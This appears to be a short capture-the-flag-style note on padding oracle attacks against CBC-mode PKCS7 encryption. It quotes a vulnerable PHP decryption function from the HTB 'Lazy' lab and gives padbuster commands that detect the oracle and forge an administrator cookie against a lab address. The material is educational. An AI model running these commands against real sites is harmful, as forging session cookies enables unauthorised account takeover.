Padding Oracle Attack

web, crypto, foothold

Overview #

CBD mode PKCS7 format uses padding to complete the block length when encrypting plaintext.

Attacker can leverage this behaviour to get the plaintext by manipulating the ciphertext byte by byte in a trial and error fashion and observing whether the application will return error (invalid padding) or success (valid padding).

This kind of crypto may be safe but the real attack surface is on whether your app is returning error on invalid padding which will give an attacker chance to brute force the correct plaintext.

// example file from HTB lazy
function decryptString($encryptedText, $passphrase) {
  $encrypted = base64_decode($encryptedText);
  $iv_size =  mcrypt_get_iv_size(MCRYPT_DES, MCRYPT_MODE_CBC);
  $iv = substr($encrypted,0,$iv_size);
  $dec = mcrypt_decrypt(MCRYPT_DES, $passphrase, substr($encrypted,$iv_size), MCRYPT_MODE_CBC, $iv);
  $str = pkcs5_unpad($dec);
  if ($str === false) {
    echo "Invalid padding"; // really? you want to be hacked?
    die();                  // maybe let's replace that or
  }                         // remove entirely?
  else {
    return $str;
  }
}

This is also a type of CCA or Chosen Ciphertext Attack.

Details on ciphertext manipulation #

Go to “The Theory” part of this link.

Detection #

Exploitation #

# installation
sudo apt-get install padbuster

# detection
padbuster http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA=="

# gets an admin cookie
padbuster http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator"

References #